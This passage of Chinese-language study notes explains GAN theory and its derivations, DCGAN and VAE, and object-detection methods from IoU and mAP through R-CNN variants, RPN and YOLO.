但是,CycleGAN 在处理一些任务时存在缺陷,比如在 改变图像中物体的形状或纹理时,可能会损失一些信息,导致无法完美复原。例如,如果你尝试去除人头像中的眼睛,CycleGAN 可能就无法做到既去除眼睛又不损失其他重要信息。

CycleGAN、DualGAN、DiscoGAN 和 UNIT 都是基于相似原理的模型,它们都旨在通过学习转换图像的同时保留关键信息,使得图像能够在不同域之间转换。

💾

对抗神经网络

2024年4月19日 20:06

动机

计算机视觉与计算机图形学

计算机视觉 (Computer Vision)

  • 判别任务(Discriminative Task):从图像中辨识出物体,如识别一辆车。
  • 生成任务(Generative Task):从标签生成对应的图像,如根据 “车” 的标签生成车辆图像。

计算机图形学 (Computer Graphics)

  • 通过编码(Encoding)和解码(Decoding)过程,实现从描述性数据生成图像。

两者关系:

CV_and_CG

CV_and_CG_2

计算机图形学与统计生成模型

  • 计算机图形学依赖大量 先验知识(Prior Knowledge) ,如材料、物理建模、光照等,来精确地生成图像。
  • 统计 / 深度生成模型(Statistical/Deep Generative Model)则通过学习 大量数据,尝试减少对先验知识的依赖。

如何区分先验知识和数据?

  • 先验知识 :在模型训练或图像生成前已经存在的知识,如物理规则或专家知识。
  • 数据 :模型训练或图像生成过程中使用的数据。

generative_model

注意,统计 / 深度生成模型仍然需要一些先验知识(如假定数据的分布),但是相比计算机图形学,它们更多地依赖数据。

生成式模型

生成模型与概率分布

生成模型的目的是为了 学习数据的概率分布 $p(x)$。理解了这个分布后,我们可以通过采样(sampling)来生成新的数据样本,即 $x_{new} \sim p(x)$。

初学的时候可能不容易理解这个概念,我们可以先类比到最简单的一维数据集上。假设我们有一个一维数据集 $D = {x_1, x_2, \ldots, x_n}$,其中每个样本不过是一个实数。

我们考虑如何在已知这些数据 $D$ 的情况下,生成新的数据样本。很自然的想法是,通过密度估计(density estimation)来估计数据的概率分布 $p(x)$。这里的密度估计指的是我们希望找到一个概率分布 $p(x)$,使得这个分布能够很好地拟合数据 $D$。

很显然,我们可以假设数据服从正态分布 $N(x | \mu, \sigma^2)$,通过最大似然估计,我们可以求解出 $\mu$ 和 $\sigma^2$ 的值,从而得到一个正态分布 $N(x | \mu, \sigma^2)$,这个分布就是我们对数据的概率分布的估计。

然后,我们就可以通过这个正态分布来生成新的数据样本。

当我们把这个简单的一维数据集推广到高维数据集时,我们就得到了生成模型的基本思想。我们知道,图片可以看做是一个具有很高维度的向量,对应的,我们的数据集也就成为了一个高维数据集。类推低维情形,我们的目标就变成了学习这个高维数据集的概率分布,然后通过这个概率分布来生成新的数据样本。

这个过程中的一些重要的概念:

  • 概率分布 :用来描述数据的可能性,可能需要先验假设,如正态分布 $N(x | \mu, \sigma^2)$。
  • 采样 :从概率分布中生成新样本的过程。
  • 密度估计 :通过数据集估计数据的概率分布。
  • 无监督表示学习 :从数据中自动发现有用特征的过程,无需标签信息。

我们用数学化的语言来表达这个过程:

已知数据集 $D = {x^1, x^2, \ldots, x^{|D|}}$,我们希望学习数据的概率分布 $p_{data}$,即 $p_{data}(x) = p(x)$。我们的目标是通过训练一个模型,使得这个模型的概率分布 $p(x | \theta)$ 能够很好地拟合 $p_{data}$。

其中:

  • $x^j$:数据集 $D$ 中的第 $j$ 个样本,$j = 1, 2, \ldots, |D|$。
  • $p_{data}$:数据集 $D$ 中样本的真实概率分布,即实际观测到数据 $x$ 的概率。一般可以简化表示为 $p(x)$
  • $p(x | \theta)$:表示模型预测的概率分布,这个分布由模型参数 $\theta$ 决定。
  • $\theta$:模型参数,通过训练优化以使得 $p(x | \theta)$ 逐渐拟合 $p_{data}$。如果我们有先验知识(假定数据分布),那么可以将 $\theta$ 限制在一个特定的集合 $M$ 中,即 $\theta \in M$。

判别式 v.s. 生成式

discriminative_vs_generative

朴素 GAN(Vanilla GAN)

引入 生成对抗网络 (GAN,Generative Adversarial Networks)的动机是为了通过一种新颖的模型训练方法生成高质量、高分辨率的图片,同时减少对先验知识的依赖。

GAN 由两部分组成:生成器(Generator)和判别器(Discriminator)。生成器负责生成图像,判别器负责判断图像是真实的还是由生成器生成的。

GAN 的工作原理可以用一个游戏的比喻来理解:生成器试图制作假币,而判别器则像警察一样,试图区分真币和假币。在这个过程中,生成器不断学习如何更好地制造假币,而判别器则不断学习如何更准确地识别。最终,生成器将能够生成与真实货币极其相似的假币,判别器也将变得非常擅长识别。

vanilla_GAN

这张图介绍了生成对抗网络(GAN)的基础概念。GAN 由两部分组成:生成器($G$)和判别器($D$)。

  • $z$:输入到生成器的随机噪声,通常来自于某种预定义的概率分布,如正态分布 $N(0,1)$。
  • $G$:生成器函数,它接收随机噪声 $z$,输出生成的数据 $\hat{x}$。
  • $D$:判别器函数,它的输入是真实数据 $x$ 生成的数据 $\hat{x}$,输出该数据为真实数据的概率。

在数学上,这个过程可以表示为一个极小极大问题:

$$ \min_G \max_D V(D, G) = \min_G \max_D \mathbb{E}{x\sim p{\text{data}}(x)}[\log D(x)] + \mathbb{E}_{z\sim p_z(z)}[\log(1 - D(G(z)))] $$

其中:

  • $\mathbb{E}{x\sim p{data}}[\log D(x)]$:当真实数据 $x$ 来自数据分布 $p_{data}$ 时,判别器判断正确的期望值。$D(x)$ 的输出是一个概率值,表示判别器认为 $x$ 是真实数据的概率。如果判别器能准确识别真实数据,这个值会很大,因为 $\log D(x)$​ 会接近于 0(注意其他情况下是负数)。

    注意,$D(x)$ 接近于 1,表示判别器认为 $x$ 是真实的。

  • $\mathbb{E}_{z\sim p_z}[\log(1 - D(G(z)))]$:当生成的数据 $G(z)$ 来自噪声分布 $p_z$ 时,判别器判断正确的期望值。$G(z)$ 的输出是一个图像,用以送入判别器判断这个图像是真实的还是生成的。如果判别器能准确识别出生成的数据不是真实的,这个值也会很大,因为 $\log(1 - D(G(z)))$ 会接近于 0

    注意,如果 $D (G (z))$ 接近于 0,则表示判别器认为生成的 $G(z)$ 不是真实的。

  • $G$ 试图最小化这个函数 $V(D, G)$

  • $D$ 试图最大化这个函数 $V(D, G)$

  • $p_{\text{data}}$ 是真实数据的分布

  • $p_z$ 是生成器输入的噪声分布

由此,我们可以定义生成器和判别器各自的损失函数:

$$ \begin{aligned}&\mathcal{L}{D}=-\mathbb{E}{x\sim p_{data}}[\log D(x)]-\mathbb{E}{z\sim p_z}[\log(1-D(G(z))]\&\mathcal{L}{G}=-\mathbb{E}_{z\sim p_z}[\log D(G(z))]\end{aligned} $$

判别器的损失函数 $\mathcal{L}_D$:第一部分是使得判别器能够正确识别真实数据,第二部分是使得判别器能够正确识别生成器产生的假数据。

生成器的损失函数 $\mathcal{L}_G$​:使得生成器产生的假数据尽可能让判别器误认为是真实数据。

简而言之,GAN 的训练就是一个博弈过程,生成器和判别器不断地互相竞争,最终目标是让生成器能生成与真实数据几乎无法区分的假数据。

单向映射:指生成器 $G$ 的作用,它将输入的随机噪声 $z$ 单向映射成尽可能接近真实数据分布的数据 $\hat{x}$,而 不能映射回来。也即,生成器 $G$ 接收一个随机的潜在空间分布(通常是正态分布或均匀分布)作为输入,并生成一个与真实数据分布相似的分布。

我们可以表示出最优的生成器和判别器:

$$ G^*=\min_G\mathbb{E}_{z\sim p_z}[\log(1-D(G(z)))] $$

$$ D^*=\max_D\mathbb{E}{x\sim p{data}}[\log D(x)]+\mathbb{E}_{z\sim p_z}[\log(1-D(G(z)))] $$

深入理解目标函数

理论上,生成器($G$)和一个判别器($D$)的博弈的解是生成器产生的数据分布 $p_g$ 与真实数据分布 $p_{data}$ 完全一样。

以下我们对这个结论做出推导。

回忆损失函数:

$$ \begin{aligned}&\mathcal{L}{D}=-\mathbb{E}{x\sim p_{data}}[\log D(x)]-\mathbb{E}{z\sim p_z}[\log(1-D(G(z))]\&\mathcal{L}{G}=-\mathbb{E}_{z\sim p_z}[\log D(G(z))]\end{aligned} $$

将生成器隐去,也即我们认为当 $z\sim p_z$ 时,$G(z)$ 的分布为 $p_g$,那么我们得到:

$$ \min_G\max_DV(G,D)=\min_G\max_D\mathbb{E}{x\sim p{data}}[\log D(x)]+\mathbb{E}_{x\sim p_g}[\log(1-D(x)] $$

这个价值函数等价于:

$$ V(G,D) = \int_{x} p_{\mathrm{data}}(x) \log(D(x)) dx + \int_{x} p_{g}(x) \log(1-D(x)) dx $$

我们想要找到函数 $V(G,D)$ 的最大值,这对应于判别器尽可能正确地区分真实数据与生成数据。

对 $D$ 求导并设其导数为零,我们可以找到最优的判别器 $D^*$,使得 $V(G,D)$ 最大化:

$$ V(G,D)' = \frac{p_{data}(x)}{D(x)} - \frac{p_g(x)}{1 - D(x)} = 0 $$

因而,我们可以得到最优判别器 $D^*$ 的表达式:

$$ D^*(x) = \frac{p_{data}(x)}{p_{data}(x) + p_g(x)} $$

这个解告诉我们,最优的判别器 $D^$ 在任何点 $x$ 上的值是由真实数据分布 $p_{data}(x)$ 与生成数据分布 $p_g(x)$ 的相对概率决定的。当这两个分布相等时,即 $p_g = p_{data}$,判别器 $D^$ 将无法区分真实数据与生成数据,此时生成器达到了其最优状态。

所以,当生成器 $G$ 固定时,最优判别器 $D^*$ 的表达式为:

$$ D^* = \frac{p_{data}}{p_{g} + p_{data}} $$

当 $p_g = p_{data}$ 时,$D^*$ 对任何输入的评估都是 0.5,意味着它不能区分真假数据。

接下来,我们将探讨在判别器 $D$ 固定的情况下,生成器 $G$ 的最优解。

我们定义了生成器的价值函数 $C(G)$,在最优判别器 $D^*$ 的条件下,$C(G)$ 的表达式为:

$$ C(G) = \max_{D} V(G,D) $$

这个函数可以进一步写为:

$$ C(G) = \mathbb{E}{x\sim p{\mathrm{data}}}[\log D_{G}^{}(x)] + \mathbb{E}{x\sim p{g}}[\log(1 - D_{G}^{}(x))] $$

将最优判别器 $D^*$ 的表达式代入上述成本函数,我们得到:

$$ C(G) = \mathbb{E}{x\sim p{\mathrm{data}}}\left[\log\frac{p_{\mathrm{data}}(x)}{p_{\mathrm{data}}(x) + p_{g}(x)}\right] + \mathbb{E}{x\sim p{g}}\left[\log\frac{p_{g}(x)}{p_{\mathrm{data}}(x) + p_{g}(x)}\right] $$

回顾一下 KL 散度的定义:

$$ KL(P||Q) = \int P(x) \log \frac{P(x)}{Q(x)} dx = \mathbb{E}_{x\sim P}[\log \frac{P(x)}{Q(x)}] $$

继而给出 Jensen-Shannon 散度(JS 散度)的定义:

$$ JS(P||Q) = \frac{1}{2} KL(P||\frac{P+Q}{2}) + \frac{1}{2} KL(Q||\frac{P+Q}{2}) $$

不难发现,JS 散度是对 KL 散度的一种改进,它可以避免 KL 散度的不对称性。JS 散度的取值范围是 $0$ 到 $1$。

然后我们发现,$C(G)$ 可以表示为 JS 散度的形式:

$$ C(G) = -\log 4 + 2 \cdot JS(p_{\mathrm{data}} || p_{g}) $$

当 JS 散度取最大值 $1$ 时,$V(G,D)$ 取得最大值 $0$(这里的 $\log$ 是以 $2$ 为底的)。

因此,当生成器 $G$ 最优时,JS 散度为 $0$,这意味着 $p_{\mathrm{data}}$ 和 $p_{g}$ 两个分布相等。换句话说,当生成器 $G$ 能够生成与真实数据分布 $p_{\mathrm{data}}$ 相同的数据分布 $p_{g}$ 时,我们认为 $G$ 达到了最优。

综上所述,当判别器 $D$ 收敛,我们通过最优判别器 $D^*$ 的表达式,可以得出生成器的损失函数。这个损失函数表明,最优化生成器 $G$ 实际上是在最小化真实数据分布 $p_{\mathrm{data}}$ 与生成数据分布 $p_{g}$ 之间的 JS 散度。当生成器最优时,JS 散度为 $0$,意味着生成的数据分布与真实数据分布无法区分。

GAN 的训练过程

GAN 的训练过程是一个迭代过程,包括以下步骤:

  1. 采样一小批量的噪声数据 $z$,并用生成器 $G$ 生成假数据。
  2. 同时采样一小批量的真实数据 $x$。
  3. 用这些真实数据和假数据来更新判别器 $D$,使得 $D$ 能更好地区分真假数据。
  4. 再次采样一批噪声数据,并用生成器 $G$ 生成新的假数据。
  5. 更新生成器 $G$,使得 $G$ 生成的假数据能更好地 “欺骗” 判别器 $D$,让 $D$ 认为这些假数据是真的。

这个过程中,判别器 $D$ 通常会更新多次($k$ 步),以便它能更准确地识别生成器 $G$ 产生的假数据。然后再更新一次生成器 $G$。这样交替更新的目的是让 $G$ 和 $D$ 在互相对抗中都能不断进步。

这里不会一开始就将判别器 $D$ 训练到最优,是因为这样会导致生成器 $G$ 难以对抗一个太强的判别器 $D$,可能会发生 梯度消失,即 $G$ 在更新时几乎不会得到有用的信息来改进自己。此外,如果 $D$ 太过完美,$G$ 可能会陷入模式崩溃(Mode Collapse),即只生成极少数类型的数据,失去了多样性。所以实际训练中,会寻找一个平衡点,让 $G$ 和 $D$ 都能得到有效的学习。

GAN_traning

隐性插值

通过实验发现,GAN 能够通过随机噪声 $z$ 产生真实感的图像,但图像质量还需要改进。$z$ 值之间的插值操作可以在数据流形上产生平滑的过渡效果,而这种插值不是简单的线性过程,而是更加复杂且和谐的变化。

隐性插值(latent interpolation) :指在生成对抗网络(GAN)中,对两个随机噪声向量(即隐空间中的点)$z_1$ 和 $z_2$ 进行插值,得到一个新的噪声向量 $z_{new}$。这个新向量可以被生成器用来产生介于两个原始向量对应图像之间的新图像。

数学上,这个插值过程可以表示为:

$$ z_{new} = \alpha \cdot z_1 + (1 - \alpha) \cdot z_2 $$

其中 $\alpha$ 是介于 0 到 1 之间的一个数,它决定了新向量是偏向于 $z_1$ 还是 $z_2$。

在高维数据空间中,这样的插值可以帮助我们探索数据的内在结构,即数据流形。在这个流形上,相似的数据点(如图像)靠得更近。通过隐性插值,我们可以平滑地从一个数据点过渡到另一个数据点,生成一系列连续变化的图像,这些图像在视觉上看起来是自然过渡的。

GAN 的问题

在复杂数据集(如 CIFAR-10)上训练时,Vanilla GAN 可能效果较差,主要原因包括:

  • 架构限制:Vanilla GAN 架构较为简单,未针对特定任务如图像生成进行优化,难以捕捉复杂数据特征和模式。

  • 训练不稳定:生成器和判别器间的竞争可能导致训练不稳定,表现为模式崩溃(mode collapse)或梯度消失 / 爆炸,影响图像质量。

  • 损失函数限制:使用的损失函数可能无法有效衡量生成图像与真实图像间的差异,难以捕捉复杂分布,导致图像质量下降。

  • 缺乏正则化:未使用正则化技术约束参数,可能引起网络过拟合或欠拟合,影响图像生成质量。

其中最重要的问题,就是训练的时候,G loss 和 D loss 是对抗的,很不稳定,这跟 MLE 方法很不一样,在过去 MLE 方法中,loss 越小就越好,但现在变成两个网络相互对抗,loss 的数值不代表好还是不好。

DCGAN(Deep Convolutional GAN)

DCGAN 是一种结合了卷积神经网络(CNN)和 GAN(生成对抗网络)的深度学习模型。DCGAN 的 Generator 使用卷积神经网络来生成图像,而判别器(Discriminator)同样使用卷积网络来判断图像是真实的还是由生成器(Generator)生成的。

除此之外,DCGAN 的创新之处还体现在它使用了一系列的技巧来稳定训练过程,如使用批归一化(Batch Normalization)、去除全连接层、使用 ReLU 激活函数等。

对抗性损失 Adversarial Loss

对抗性损失是 GAN 中的一个核心概念,它是指 Generator 和 Discriminator 之间的对抗过程。这种对抗性质使得 Adversarial Loss 在图像生成任务中比传统的均方误差(MSE)更加有效,因为它能够促使生成的图像在视觉上更加逼真。

举个例子:

mse_vs_adversial_loss

为什么会出现这种差异呢?因为如果这个耳朵不能被重建的话,判别器就会认为这个人像图不够真实,这是很容易被判别器发现的。

我们可以发现,对抗学习比 MSE 更加像人类,我们通常说 对抗学习是一种自适应的损失函数 (Adversarial loss = automatic/adaptive loss),在训练不同阶段,它能够关注不同的东西。这是因为对抗损失 不仅考虑像素级别的相似度,还考虑了图像的整体分布。这意味着生成的图像在整体结构和细节上都更加逼真。

比方说,刚刚开始训练的时候,它可能先关注简单的东西,比如人像的轮廓,先让生成器能把轮廓给生成出来。

但是随着生成器能力的不断提高,它可能会开始关注细节信息了,比如眼睛、耳朵、嘴巴,让生成器能把细节生成出来。

所以对抗学习有这么一个 MSE 做不到的优点。

变分自编码器(Variational Autoencoder, VAE)

vae_and_gan

VAE(变分自编码器)是一种生成模型,它包含一个 Encoder 将数据编码为一个潜在空间的表示,和一个 Generator(也称为 Decoder) 将潜在空间的表示解码回数据

GAN 通常能够生成比 VAE 更清晰、更逼真的图像,因为 GAN 的对抗性损失促使生成器学习到更加精细的数据分布,而 VAE 的重构损失和 KL 散度(KLD)则可能导致生成的图像较为模糊。

  • VAE = Generator + Encoder
  • Vanilla GAN = Generator + Discriminator
  • Better GAN = Generator + Discriminator + Encoder

💾

卷积神经网络应用

2024年4月4日 02:53

总览

在 AI 领域,任务大致分为两类: 判别式任务生成式任务

判别式任务

判别式任务关注于从给定的数据中识别或分类信息。常见的应用包括:

二维(2D)任务

  • 分类(Classification) :识别给定图像的类别。
  • 检测(Detection) :识别图像中的对象及其位置。
  • 识别(Recognition) :比如,人脸识别。
  • 分割(Segmentation) :将图像分成多个部分或对象。
  • 检索(Retrieval) :根据特定特征搜索相似图像。
  • 语言处理(Language) :例如,文本分类或情感分析。

三维(3D)任务

  • 3D 建模(3D Modeling) :从 2D 图像生成 3D 模型。
  • 增强现实(Augmented Reality) :在真实世界的视图中叠加计算机生成图像。
  • 双目视觉(Binocular Vision) :利用两个相机从不同角度捕捉图像,以模拟人的双眼视觉。

生成式任务

生成式任务旨在基于已有的数据或模式生成新的数据实例。例如,根据一组图像生成新的图像(如图片修补、遮瑕),或根据一段文本生成相关的文本。

目标检测(Object Detection)

目标检测:识别图像中的物体,并确定它们的位置和类别。这个过程通常包括两个步骤:首先是定位物体,通常通过绘制边界框(Bounding Box)来实现;其次是识别这些物体的类别,即打上相应的标签。

效果评估

在目标检测中,我们通过以下几个指标来评估模型的性能:

交并比 (Intersection over Union, IoU)

$$ IoU=\frac{\text{预测的边界框与真实边界框的交集面积}}{\text{预测的边界框与真实边界框的并集面积}} $$

IoU 量化边界框预测的准确性。

iou

当 IoU 等于 1 时,意味着预测边界框与真实边界框完全重合, 预测结果是完美的。

当 IoU 等于 0 时,表示预测边界框与真实边界框完全没有重叠, 预测结果完全不匹配。

当 IoU 大于某个阈值(如 0.5)时,我们通常认为物体被成功检测到。在实际应用中,可以根据任务需求调整 IoU 阈值, 以权衡检测的精确度和召回率。

平均精确度 (Average Precision, AP)

综合考虑精确率和召回率的性能指标。AP 是 P-R 曲线(精确率 - 召回率曲线)下方的面积。

精确率和召回率的计算公式分别为 (这些划了重点,要记住)

  • 精确率 (Precision):$Precision = \frac{TP}{TP+FP}$,其中 TP 是真阳性(正确预测的正类样本数),FP 是假阳性(错误预测为正类的样本数)。也即分母是 预测为正类 的样本数。
  • 召回率 (Recall):$Recall = \frac{TP}{TP+FN}$,其中 TP 是真阳性(正确预测的正类样本数), FN 是假阴性(错误预测为负类的正类样本数)。也即分母是 实际是正类 的样本数。

尽管问题是多分类问题,但是这里的正类、负类是一个二分类的意思,也即 “是猫” 和 “不是猫”。

注:

  • 真阳性 (True Positive, TP) :预测为正类且实际上是正类的样本。
  • 假阳性 (False Positive, FP) :预测为正类但实际上是负类的样本。
  • 真阴性 (True Negative, TN) :预测为负类且实际上是负类的样本。
  • 假阴性 (False Negative, FN) :预测为负类但实际上是正类的样本。

记忆:真 / 假代表你的判断是否准确,阳性 / 阴性代表你的判断结果是正类还是负类。

ap

P-R 曲线的横轴表示召回率(Recall),纵轴表示精确度(Precision)。P-R 曲线并不直接展示置信度阈值,而是通过改变置信度阈值来改变检测结果,从而得到一系列不同的精确度和召回率值。然后,将这些值绘制在二维平面上,形成 P-R 曲线。

  • 当置信度阈值较高时,预测结果的精确度较高,但召回率较低;
  • 当置信度阈值较低时,召回率较高,但精确度较低。

因此,在实际应用中,我们需要在精确度和召回率之间取得平衡。

AP 是 P-R 曲线下的面积,用于衡量模型在不同置信度阈值下的整体性能。AP 值越高,说明模型在 该类别 上的检测性能越好。

正如我们刚才所说的,问题本身是个多分类问题,只不过我们根据每个类,又划分为了二分类问题 “是或不是”。

因此,我们可以计算每个类别的 AP,然后取平均值,得到 mAP(mean Average Precision)。mAP 值越高,说明模型在 整个数据集 上的检测性能越好。

AP@IoU

还记得目标检测的定义吗?我们要先定位物体,然后识别物体的类别。在衡量模型的准确性时,我们通常会分别计算定位的准确性(IoU),然后选择一个 IoU 阈值,计算 IoU 大于该值时的 AP,即 AP@IoU,如 AP@0.5。

R-CNN(Region-based Convolutional Neural Networks)

R-CNN 是一种经典的目标检测算法,其基本思想是:

  1. 提取候选区域:首先,使用 选择性搜索(Selective Search) 等方法从图像中提取 候选区域(Region Proposal),然后 将所有候选区域调整为给定的固定大小 (因为 CNN 需要固定大小的输入)。

    选择性搜索的步骤如下:

    1. 多尺度图像分割
    2. 生成初始区域:在每个尺度上,基于颜色、纹理、亮度等特征将图像分割成多个初始区域。
    3. 区域合并:见后文 NMS
    4. 筛选候选区域:为了减少计算量,仅筛选保留选择一部分进行后续计算。

    可见,选择性搜索不是基于卷积的,很费时费力。

  2. 特征提取 :然后,对每个候选区域使用 CNN (如 VGG)进行特征提取,得到固定大小的特征向量。

  3. 分类:最后,使用 支持向量机(SVM) 等分类器对每个候选区域进行分类。

  4. 边界框回归 :在选择性搜索之后,使用线性回归模型对每个候选区域的边界框进行精细微调,以提高定位的准确性(即使其更准确地框住目标物体)。

非极大值抑制(NMS)

NMS(Non-Maximum Suppression):在 R-CNN 中,为了避免多个候选区域重复检测同一个物体,我们通常会使用 NMS 算法对检测结果进行筛选。

NMS

NMS 的步骤是:

  1. 首先,对每个类别的所有预测边界框进行排序,以便根据其分类得分或置信度进行排序。将得分最高的边界框作为参考框。

  2. 对于每个参考框,计算与其余边界框的重叠程度,即计算它们之间的 IoU(Intersection over Union)值。

  3. 如果某个边界框与参考框的 IoU 值大于预先设定的阈值(例如 0.5),则将其视为重叠,并从候选边界框列表中删除。

    所以,IoU 越小,阈值越低,抑制的越多。

  4. 从列表中删除当前参考框,然后重复步骤 1-3,直到所有边界框都被处理。

更具体地说,目标检测模型会为每个检测框输出两个主要的预测结果:

  1. 类别概率:对于每个检测框,模型会预测一个类别概率分布,即该框属于各个类别的概率。

  2. 存在置信度:模型还会为每个检测框输出一个存在置信度,表示该检测框内是否确实存在一个物体。

在 NMS 过程中,置信度的使用通常遵循以下步骤:

  • 排序:首先,根据存在置信度对所有检测框进行排序,选择 置信度最高 的检测框作为初始的检测结果。

  • 比较:然后,将这个检测框与列表中的其他检测框逐一比较,计算它们之间的重叠度(如交并比 IoU)。

  • 抑制:如果某个检测框与已选择的检测框重叠度较高(超过预设的阈值),则认为这个检测框不是最佳的检测结果,因此将其从候选列表中移除。

  • 迭代:重复上述过程,直到所有检测框都被评估过,最终得到 一组没有重叠且置信度较高的检测框 作为最终的检测结果。

值得注意的是,虽然 NMS 主要关注 存在置信度,但在某些情况下,类别置信度或结合置信度也可以用于改进 NMS 的性能。例如,可以对每个类别分别执行 NMS,或者在 NMS 的阈值选择中考虑类别置信度,以更好地平衡不同类别的检测效果。

SPP Net (Spatial Pyramid Pooling Network)

R-CNN 在目标检测领域取得了显著成就,但它存在一些局限性。SPP Net(空间金字塔池化网络)针对这些问题提出了改进方案。

R-CNN 的局限性

  1. 选择性搜索速度慢 :在图像中寻找潜在的对象框架耗时太长。
  2. 调整候选区域尺寸问题:候选区域尺寸调整可能导致 宽高比例变化,影响分类准确性。
  3. 处理效率低 :将每个区域单独输入到 CNN(如 VGG 网络)中处理非常耗时。
  4. 非端到端训练 :模型训练不是一个连贯的过程(分成了选择性搜索、卷积网络、SVM 三个部分),影响训练效率和效果。

Q:什么是端到端训练?

A:端到端训练是指将整个模型作为一个整体进行训练,而不是将模型分为多个部分分别训练。端到端训练的优势在于可以更好地优化整个模型,提高模型的性能。

对于这些问题,SPP Net 主要针对 R-CNN 的第二和第三个问题提出了解决方案,通过使用空间金字塔池化(Spatial Pyramid Pooling, SPP)层,实现了 对不同尺寸输入的统一处理 ,从而提高了处理效率,并保持了图像的宽高比例,避免了分类准确性的损失。

空间金字塔池化(SPP)

空间金字塔池化层的核心思想是将不同大小的输入通过 多层 maxpool 池化操作 转换为固定大小的输出。不同于一般的池化层,空间金字塔池化层会使用滑窗 自适应 地对输入进行划分,从而保持了输入的宽高比例。

"自适应" 意味着池化层可以根据输入图像的尺寸 自动调整池化窗口(滑窗)的大小和步长,以确保输出的尺寸是固定的。这一点通过以下公式实现:

$$ \text{win} = \lceil \frac{a}{n} \rceil, \quad \text{str} = \lfloor \frac{a}{n} \rfloor $$

其中:

  • $\text{win}$ 表示池化窗口的大小
  • $\text{str}$ 表示池化操作的步长
  • $a$ 表示输入图像的宽度或高度(对于宽度和高度,该过程是独立进行的)
  • $n$ 表示希望得到的输出尺寸(例如,如果希望输出是一个 $n \times n$ 的特征图,则对宽度和高度都应用这个过程)

通过这种方式,SPP 层能够处理任意尺寸的输入图像,并将其转换为固定大小的输出,这对于构建输入尺寸不固定的神经网络模型(如不同尺寸的图像输入)非常有用。而且这同时保持了输入图像的宽高比例,从而能够保留图像的原始几何和结构信息。

回忆一下之前讲过的金字塔池化,这里还有一个改进就是会 在不同尺度上执行池化,以捕获多尺度信息

SPP 具体操作

  1. 全局特征提取 :首先,将整张图像输入到 CNN 中,获得全局特征图。即,将原先的卷积层前置到选择性搜索 Selective Search 之前,从而先完成了一个全局的特征提取。
  2. 候选区域选择在特征图上 而非原始图像上选择候选区域,这样做更加高效且泛化能力更强。
  3. 空间金字塔池化 :对每个候选区域应用 SPP 层,无论输入的尺寸如何,都能输出固定大小的特征向量。

通过这种方式,SPP Net 不仅提高了处理效率,还保持了输入图像的宽高比例,避免了因尺度调整带来的准确性损失。

SPP Net 与 R-CNN 的对比

rcnn-vs-spp

rcnn-vs-spp-2

与 R-CNN 相比,SPPNet 具有以下优点:

  • 使用全局特征,而非逐个将图像输入到 VGG 中。
  • 不改变图像尺度。

Fast R-CNN

Fast R-CNN 是一种用于目标检测的深度学习模型,它对前身模型 SPP Net 和 R-CNN 的一些局限性做出了改进。

SPP Net 的局限性

  • 使用选择性搜索 :这一步骤用于在图片中识别出可能包含目标的区域,但它的速度非常慢,成为模型效率的瓶颈。
  • 非端到端训练 :SPP Net 在训练时,需要分开训练分类器、边界框回归器和 CNN 特征提取器,这增加了训练的复杂度。

Fast R-CNN 的贡献

Fast R-CNN 对这些问题进行了改进,其主要贡献包括:

  • 感兴趣区域 (Region of Interest, ROI) 池化层:这是一种 简化的空间金字塔池化技术 ,它只使用一个固定的池化尺寸来从各个感兴趣区域中提取特征,从而加快了模型的运行速度。
  • 端到端训练 (近似) :Fast R-CNN 可以将分类器、边界框回归器和 CNN 特征提取器一起进行训练,通过这种方式,模型能够更好地学习到从原始图片到最终目标检测结果之间的映射关系。

ROI Pooling

与 SPP 相比,ROI 池化专注于处理不同尺寸和形状的感兴趣区域,将它们转换成固定尺寸的特征图。对于每个 ROI,不论其原始尺寸如何,ROI 池化都会将其划分成固定数量的网格(例如,$7\times7$),并在每个网格内进行最大池化。这意味着,不同尺寸的 ROI 经过池化后,都会被转换成相同尺寸的特征图,便于后续的处理。

roi-pooling

一个更进一步的改进是 RoI Align,它通过 双线性插值 来更精确地对齐特征图和 ROI 区域,从而提高了检测的准确性。

roi-align

Faster R-CNN

Fast R-CNN 的局限性

仍然使用选择性搜索,速度非常慢。

Faster R-CNN 的贡献

  • 使用 区域提议网络(Region Proposal Network, RPN) 替换选择性搜索, 使神经网络能够搜索候选区域,速度更快。
  • 实现 真端到端训练 (全是网络,没有 Selective Search),准确性提高。

RPN(Region Proposal Network)

rpn-1

RPN 使用一个滑动窗口在输入图像的特征图上滑动,窗口的大小通常与卷积核的大小相同。

在每个 特征图 的像素点上,预测相应的锚框(anchor box,可以理解为候选区域)是否包含物体(二分类,也即对应的目标概率)。

使用非极大值抑制(NMS)方法对预测的锚框进行筛选,保留具有较高目标概率和较小重叠的候选区域。

将筛选后的候选区域输入到 Fast R-CNN 网络中进行目标分类和定位。

对于正类样本框,还要预测从锚点到真实边界框的修正值(每个像素回归 4 个数字)。

rpn-2

  • 对于每个特征图的像素点,我们可以选择多个可能的锚点
  • 按照它们的 “物体性” 得分对所有样本框进行排序,取前 N 个(如 300 个)作为我们的提议。
  • 采用 NMS 筛选

至今总结

由于这个发展过程常考选择题,在此总结如下。

获取区域提议 Regin Proposal

  • R-CNN、SPP Net、Fast R-CNN 使用选择性搜索 Selective Search 获得 Region proposal
  • Faster R-CNN 使用区域提议网络 Region proposal network(RPN)获得 Region proposal

特征提取

R-CNN、SPP Net、Fast R-CNN、Faster R-CNN 均使用深度神经网络进行特征提取

分类与回归

  • R-CNN、SPP Net 使用 SVM 完成分类任务
  • Fast R-CNN、Faster R-CNN 使用深度神经网络完成分类和回归任务

YOLO

传统的目标检测方法往往需要先生成大量的候选区域(区域提议),然后对这些区域进行分类和位置调整。与这些方法不同, YOLO(You Only Look Once) 采用了一种全新的思路。

YOLO 不需要区域提议,它通过一个 完全卷积网络(Fully Convolutional Neural Network, FCN) 直接对图像进行处理,一步到位地输出目标的类别标签和位置信息。这种设计使得 YOLO 在速度上有了巨大的优势,具有更高的实时性和更好的准确性。

YOLO

在 YOLO 中,图像被划分为多个格子,每个格子称为一个 patch (可以理解为图片的一小块区域)。YOLO 在每个 patch 上进行回归分析,即直接预测 目标的边界框和类别概率。这种方法与 RPN(Region Proposal Network) 的本质区别在于,RPN 先生成候选区域,再对这些区域进行分类和回归,而 YOLO 跳过了生成候选区域这一步,直接在整个图像上进行预测。

这直接使得原先的 目标检测问题变为了一个回归问题

YOLO 的技术细节包括:

  1. 每个网格单元的输出:在 YOLO 中,每个网格单元会输出 30 个数值。这些数值包含了两个边界框的信息(每个边界框 5 个数值:中心点 x、中心点 y、宽度 w、高度 h、置信度)和 20 个类别概率(对应 VOC 数据集中的 20 个类别)。
  2. 边界框和置信度:每个边界框的置信度表示该框中有物体的可信程度以及物体与该框的匹配程度。低置信度的边界框会被忽略。
